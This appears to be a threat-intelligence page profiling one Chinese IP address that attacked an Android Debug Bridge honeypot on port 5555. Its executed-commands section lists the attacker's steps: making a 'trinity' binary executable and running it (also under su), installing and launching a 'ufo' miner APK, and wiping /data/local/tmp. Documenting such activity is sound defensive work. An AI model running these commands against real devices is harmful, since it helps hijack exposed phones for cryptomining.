TROYANOSYVIRUS
Active ThreatLOW

39.129.30.199

Country of Origin🇨🇳 China
First Detection4/21/2026
Last Activity4/21/2026
ISPChina Mobile Communications Group Co., Ltd.
🎯
24
Total Attacks
🔌
1
Ports
📡
1
Attack Types
🦠
5
Malware

Geolocation

Country
🇨🇳 China
City
Unknown
ASN
AS9808
ISP
China Mobile Communications Group Co., Ltd.

Attack Types

adb_honeypot

Attacked Ports

5555

Associated Malware

Executed Commands

$/data/local/tmp/nohup /data/local/tmp/trinity2x
$/data/local/tmp/nohup su -c /data/local/tmp/trinity2x
$chmod 0755 /data/local/tmp/nohup2x
$chmod 0755 /data/local/tmp/trinity2x
$pm install /data/local/tmp/ufo.apk1x
$pm path com.ufo.miner1x
$am start -n com.ufo.miner/com.example.test.MainActivity1x
$rm -rf /data/local/tmp/*1x
$ps | grep trinity1x
$rm -f /data/local/tmp/ufo.apk1x

Shodan InternetDB ExposureShodan

InternetDB data, not real-time

Ports
8180

Risk Assessment

30
/100
LowMediumHighCritical